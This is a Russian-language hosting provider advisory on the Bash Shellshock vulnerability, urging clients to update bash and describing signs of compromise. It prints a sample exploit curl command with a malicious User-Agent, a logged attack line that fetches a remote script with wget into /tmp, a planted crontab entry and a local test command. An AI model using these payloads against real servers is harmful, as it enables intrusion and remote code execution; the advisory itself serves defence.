Взлом серверов через уязвимость "Bash Shellshock"

Наверняка вы уже слышали об обнаруженной в сентябре этого года уязвимости “Bash Shellshock”. Уязвимость присутствует в 100% старых операционных систем, использующихся нашими клиентами услуги VDS и Dedicated. Подробные инструкции по обновлению bash представлены в статье на нашем сайте. На данный момент, среди наших клиентов уже зафиксированы случаи взлома серверов с необновленным bash.

Как понять, что вас взломали? На взломанном сервере резко возрастает потребление трафика и объем используемых ресурсов процессора, запускаются “подозрительные”” процессы, в crontab прописываются сторонние команды.

На примере

Эксплуатируют уязвимость “Bash Shellshock” таким образом:

curl -H "User-Agent: () { :;};/usr/bin/id" http://(ip-адрес)/cgi-bin/php

После этого от имени www-data запускается:

-- /usr/bin/id.

Так выглядит запись в логе веб-сервера об атаке:

127.0.0.1:80 178.60.32.36 - - [20/Oct/2014:01:44:45 +0600] "GET /cgi-bin/php HTTP/1.1" 500 811 "-" "() { :;}; /usr/bin/wget -O /tmp/c.pl --no-check-certificate http://(ip-адрес)/t.txt

На взломанном сервере можно наблюдать сторонние команды в crontab:

root@uХХХХХ:~# cat /var/spool/cron/crontabs/www-data
# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (cron installed on Mon Oct 20 01:22:02 2014)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
* * * * * /dev/shm/.f/update >/dev/null 2>&1

root@uХХХХХ:~# ls /dev/shm/.f/update
/dev/shm/.f/update

А так же “сторонние” процессы от пользователя www-data (от которого должен быть запущен только apache/nginx):

root@uХХХХХ:~# ps axu | grep www-data
...
www-data 21639 12.6  0.1   4568  2416 ?        R    00:26  15:42 klogd -x
www-data 22806  0.0  0.0   4568  1684 ?        S    01:22   0:00 klogd -x
www-data 22810  0.0  0.0   2112   952 ?        Ss   01:22   0:02 crond
www-data 23634  1.1  0.1   4568  2436 ?        S    01:52   0:26 klogd -x
...

Мы приняли срочные меры по устранению проблемы: чтобы прекратить попытки взлома, настроили фильтрацию для серверов на которых размещаются клиенты с услугой VDS, кроме того выполнили автоматизированное обновление bash на 99% виртуальных Облачных серверов наших клиентов. В связи с этим обращаем ваше внимание на необходимость незамедлительного обновления bash!

Быстрая проверка на наличие уязвимости

Для проверки вашего bash на предмет уязвимости достаточно зайти в консоль сервера и выполнить вот такую команду:

env X="() { :;} ; echo vulnerable" bash -c "echo stuff"

Если в результате выполнения этой команды вы увидите две строки и одна из них будет со словом ‘vulnerable’, ваш bash уязвим.

Если вы не знаете как произвести обновление или даже как проверить уязвима ли операционная система на вашем сервере, рекомендуем обратиться в нашу техническую поддержку по телефонам +7 (343) 253-55-00, 8-800-2000-699 или электронной почте info@netangels.ru. Работы по обновлению системы будут произведены на платной основе по нашему прейскуранту.